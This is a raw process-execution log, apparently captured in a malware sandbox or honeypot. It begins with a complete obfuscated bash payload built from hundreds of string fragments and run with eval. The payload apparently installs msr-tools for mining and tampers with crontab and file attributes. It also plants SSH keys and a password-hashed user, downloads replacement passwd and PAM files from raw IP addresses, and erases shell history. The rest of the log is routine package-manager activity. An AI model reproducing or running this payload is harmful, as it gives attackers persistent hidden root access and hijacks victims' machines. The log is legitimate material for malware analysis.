"i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! 
g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! 
-';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! 
X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval 
"$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tB
z$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$u
Hz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz
$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 42 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/sbin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 42 --configure --pending]

/usr/sbin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/perl

[perl -e @pwd = getpwnam("man"); $) = $( = $pwd[3]; $> = $< = $pwd[2]; exec "/usr/bin/mandb", @ARGV -- -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[sh -c /usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/share/debconf/frontend

[/usr/share/debconf/frontend /usr/sbin/needrestart]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/usr/sbin/needrestart

[/usr/sbin/needrestart]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.10

[/usr/bin/python3.10 -]

/usr/bin/python3.10

[/usr/bin/python3.10 -]

/bin/sh

[sh -c if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

